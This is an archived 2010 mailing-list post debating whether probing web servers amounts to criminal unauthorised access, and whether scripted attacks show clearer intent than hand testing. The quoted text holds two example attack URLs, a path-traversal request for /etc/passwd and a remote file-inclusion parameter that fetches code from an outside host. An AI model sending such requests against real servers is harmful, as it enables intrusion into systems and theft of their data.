Being safe on the internet (was Re: Here we go again - ISP DPI, but is it interception?)
James Firth
james2 at jfirth.net
Thu Aug 5 08:14:11 BST 2010
Jon Ribbens wrote:
> Personally, I think that (attempting to) access http://example.com/
> or http://example.com/../ shows little-to-no evidence of knowingly
> attempting to access unauthorised data. If however, as is seen
> commonly, someone attempts to access something like
> http://example.com/../../../etc/passwd or
> http://example.com/index.php?include=http://1.2.3.4/hax0r.inc
> or similar, then the user is quite blatantly attempting unauthorised
> access and can most certainly be regarded as a criminal.
I see attacks on my servers on a daily basis - literally.
As you perhaps hinted the intent can best be shown through a sustained
attack, and this in probably all cases is script driven.
So - a machine-driven attack containing hundreds and usually thousands of
requests across various known vulnerabilities is a clear line.
Unfortunately such attacks usually come from compromised machines, although
I'm possibly in breach of the law even going back to the source IP to
establish whether it's been compromised using any well-known method.
In my view attempting to exploit any one or more of the vulnerabilities "by
hand" using mainstream commercial tools should not be actionable.
James Firth
More information about the ukcrypto
mailing list